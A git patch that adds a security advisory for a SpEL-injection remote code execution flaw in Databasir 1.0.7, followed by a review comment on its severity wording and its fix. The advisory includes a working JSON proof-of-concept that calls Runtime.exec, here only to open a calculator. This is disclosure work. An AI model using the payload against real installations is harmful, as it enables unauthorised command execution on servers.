From aa44d9c43c735e75d2e2f088f7ba36c1acad0327 Mon Sep 17 00:00:00 2001 From: luelueking <93204032+luelueking@users.noreply.github.com> Date: Mon, 13 Feb 2023 13:07:06 +0800 Subject: [PATCH] Create SECURITY_1.0.7_RCE.md Databasir 1.0.7 has Remote Code Execution vulnerability. --- SECURITY_1.0.7_RCE.md | 75 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 SECURITY_1.0.7_RCE.md diff --git a/SECURITY_1.0.7_RCE.md b/SECURITY_1.0.7_RCE.md new file mode 100644 index 0000000..4988026 --- /dev/null +++ b/SECURITY_1.0.7_RCE.md 
@@ -0,0 +1,75 @@ +### 影响 + +Databasir is a team-oriented relational database model document management platform. +Databasir 1.0.7 has remote code execution vulnerability. +Remote code execution vulnerability is a Web security vulnerability, we can execute any command, such as `open -a Calculator` + +### 不安全的代码 + +`SpelScriptEvaluator`使用了StandardEvaluationContext作为context,`script`参数可控并且没有任何过滤 + +> SimpleEvaluationContext - 针对不需要 SpEL 语言语法的全部范围并且应该受到有意限制的表达式类别,公开 Spal 语言特性和配置选项的子集。 +> +> StandardEvaluationContext - 公开全套 SpEL 语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 + +```java +@Component +@RequiredArgsConstructor +public class SpelScriptEvaluator implements MockScriptEvaluator { + + private final SpelExpressionParser spelExpressionParser = new SpelExpressionParser(); + + @Override + public String evaluate(String script, ScriptContext context) { + Expression expression = spelExpressionParser.parseExpression(script); + StandardEvaluationContext spelContext = new StandardEvaluationContext(context); + return expression.getValue(spelContext, String.class); + } +} +``` + +### 漏洞入口 + +在进行rules校验时 + +```java + @PreAuthorize("hasAnyAuthority('SYS_OWNER', 'GROUP_OWNER?groupId='+#groupId, 'GROUP_MEMBER?groupId='+#groupId)") + @Operation(summary = "保存 Mock Rule") + @AuditLog(module = AuditLog.Modules.PROJECT, name = "保存 Mock Rule", + involvedProjectId = "#projectId", + involvedGroupId = "#groupId") + @PostMapping(Routes.MockData.SAVE_MOCK_RULE) + public JsonData saveMockRules(@PathVariable Integer groupId, + @PathVariable Integer projectId, + @PathVariable Integer tableId, + @RequestBody @Valid List rules) { + mockDataService.saveMockRules(projectId, tableId, rules); + return JsonData.ok(); + } +``` + +### POC + +攻击者可以控制rules的参数来造成rce,例如: + +```json +[ + { + "columnName": "test", + "dependentColumnName": "test", + "dependentTableName": "test", + "mockDataScript": "T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('open -a Calculator')", + "mockDataType": 
"SCRIPT", + "tableName": "test" + } +] +``` + +![在这里插入图片描述](https://img-blog.csdnimg.cn/2bc2a508c7934b44803437cb64670678.png) + + + +### 修复建议 + +最直接的方式:使用`SimpleEvaluationContext`来替换`StandardEvaluationContext` +
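Review bot: The preconditions for the RCE are understated in the `### 影响` section of this hunk: the entry point `saveMockRules` shown under `### 漏洞入口` is guarded by `@PreAuthorize("hasAnyAuthority('SYS_OWNER', 'GROUP_OWNER?groupId='+#groupId, 'GROUP_MEMBER?groupId='+#groupId))`, so the claim "we can execute any command" should say that an authenticated account holding SYS_OWNER, or GROUP_OWNER/GROUP_MEMBER for the target group, can reach the vulnerable `mockDataScript` evaluation; readers triaging severity need that distinction from an unauthenticated RCE. The `### 修复建议` section also needs qualification: replacing `StandardEvaluationContext` with `SimpleEvaluationContext` in `SpelScriptEvaluator.evaluate` does remove the `T(...)` type reference the POC relies on, but `SimpleEvaluationContext` is obtained through its builders (`SimpleEvaluationContext.forReadOnlyDataBinding().build()` or `forPropertyAccessors(...)`), not by `new`, and any legitimate `mockDataScript` that used type references, constructors or arbitrary method calls will stop evaluating, so the advisory should state which expression forms remain supported after the fix. Finally, the file names only the version tested (`SECURITY_1.0.7_RCE.md`) and the body gives no affected range or fixed release; please add both, and replace the externally hosted screenshot (`img-blog.csdnimg.cn`, with the placeholder alt text `在这里插入图片描述`) with an in-repo image or drop it, since the JSON request body already documents the POC.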